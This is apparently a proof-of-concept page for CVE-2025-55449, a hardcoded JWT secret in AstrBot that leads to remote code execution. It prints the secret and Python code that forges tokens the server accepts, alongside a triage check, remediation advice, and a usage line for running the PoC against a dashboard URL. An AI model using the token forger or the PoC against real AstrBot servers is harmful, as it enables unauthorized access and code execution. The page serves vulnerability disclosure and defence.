
CVE-2025-55449 PoC — AstrBot security vulnerability (hardcoded JWT secret)

Source
Associated Vulnerability
Title: AstrBot security vulnerability (CVE-2025-55449)
Description: AstrBotDevs AstrBot 3.5.15 uses the string Advanced_System_for_Text_Response_and_Bot_Operations_Tool as the hardcoded secret (HMAC key) for signing JWTs, so anyone who knows the constant can mint tokens the server accepts.
Description
RCE in older AstrBot versions
Readme
# Introduction

AstrBot <= 3.5.17 hardcodes the JWT secret in [the source](https://github.com/AstrBotDevs/AstrBot/blob/v3.5.17/astrbot/core/__init__.py). Anyone can therefore forge a valid dashboard token, upload an arbitrary plugin, and thereby obtain RCE.
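
The block below is an added example, not the PoC's own `main.py` and not AstrBot code. It is a dependency-free HS256 implementation that shows what the leaked constant buys an attacker (a token the vulnerable server accepts) and how a defender can check a live instance for it. The claim names `username` and `exp` are an assumption for illustration; the page states neither AstrBot's real claim layout nor the plugin-upload endpoint, so the example stops at forging and verifying tokens. `verify_hs256` doubles as the checks a server-side verifier should perform (algorithm pinned, constant-time MAC comparison, expiry), and `generate_instance_secret` shows the remediation shape: a random per-installation secret instead of a constant.

```python
import base64
import hashlib
import hmac
import json
import secrets
import time

# The constant named in the CVE description; vulnerable releases use it as the HMAC key.
HARDCODED_SECRET = "Advanced_System_for_Text_Response_and_Bot_Operations_Tool"


def _b64url_encode(data: bytes) -> str:
    return base64.urlsafe_b64encode(data).rstrip(b"=").decode("ascii")


def _b64url_decode(text: str) -> bytes:
    return base64.urlsafe_b64decode(text + "=" * (-len(text) % 4))


def sign_hs256(claims: dict, secret: str) -> str:
    """Build a compact HS256 JWT: b64url(header).b64url(claims).b64url(HMAC-SHA256)."""
    header = {"alg": "HS256", "typ": "JWT"}
    signing_input = ".".join(
        _b64url_encode(json.dumps(part, separators=(",", ":")).encode())
        for part in (header, claims)
    )
    mac = hmac.new(secret.encode(), signing_input.encode(), hashlib.sha256).digest()
    return signing_input + "." + _b64url_encode(mac)


def verify_hs256(token: str, secret: str, now=None):
    """Return the claims if `token` is a well-formed, correctly signed, unexpired
    HS256 JWT under `secret`; otherwise return None.

    The algorithm is pinned to HS256 so a caller cannot downgrade to "none",
    and the MAC comparison is constant-time."""
    try:
        header_b64, claims_b64, mac_b64 = token.split(".")
        header = json.loads(_b64url_decode(header_b64))
        claims = json.loads(_b64url_decode(claims_b64))
        mac = _b64url_decode(mac_b64)
    except (ValueError, UnicodeDecodeError):
        return None
    if not isinstance(header, dict) or not isinstance(claims, dict):
        return None
    if header.get("alg") != "HS256":
        return None
    expected = hmac.new(
        secret.encode(), f"{header_b64}.{claims_b64}".encode(), hashlib.sha256
    ).digest()
    if not hmac.compare_digest(mac, expected):
        return None
    exp = claims.get("exp")
    if exp is not None:
        if not isinstance(exp, (int, float)) or isinstance(exp, bool):
            return None
        if (time.time() if now is None else now) >= exp:
            return None
    return claims


def forge_token(username: str = "astrbot", ttl: int = 3600) -> str:
    """Mint a token that a server still using HARDCODED_SECRET will accept.

    The claim names are an assumption for illustration; the page does not say
    which claims AstrBot puts in its tokens."""
    claims = {"username": username, "exp": int(time.time()) + ttl}
    return sign_hs256(claims, HARDCODED_SECRET)


def signed_with_hardcoded_secret(token: str) -> bool:
    """Triage check for defenders: take a token issued by a live instance (for
    example from a legitimate login) and see whether it verifies under the
    leaked constant. True means the instance is still on the vulnerable secret."""
    return verify_hs256(token, HARDCODED_SECRET) is not None


def generate_instance_secret() -> str:
    """Remediation shape: a random per-installation secret drawn from the OS
    CSPRNG at first start, which is what a fixed server should use instead."""
    return secrets.token_urlsafe(32)


if __name__ == "__main__":
    forged = forge_token()
    print("forged token:", forged)
    print("accepted by a vulnerable server:", signed_with_hardcoded_secret(forged))
    patched = sign_hs256({"username": "astrbot"}, generate_instance_secret())
    print("patched-server token verifies under leaked secret:",
          signed_with_hardcoded_secret(patched))
```

Running the block prints a forged token; passing a token captured from a real login to `signed_with_hardcoded_secret` tells you whether an instance is still using the constant. Rotating to a random secret also invalidates every token issued under the old one, which is the intended side effect of the fix.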

# Usage

```shell
# Argument: base URL of the target AstrBot dashboard
python main.py 'http://127.0.0.1:6185'
```

# Source code

https://github.com/AstrBotDevs/AstrBot.git
File Snapshot

[4.0K] /data/pocs/355c7a85aca963770a97c8fdc0f26b8916d217fc
├── [1.9K] flake.lock
├── [2.5K] flake.nix
├── [1.7K] main.py
├── [4.0K] payload-zip-main
│   ├── [1.0K] LICENSE
│   ├── [1.1K] main.py
│   ├── [ 302] metadata.yaml
│   └── [   5] README.md
└── [ 302] README.md

2 directories, 8 files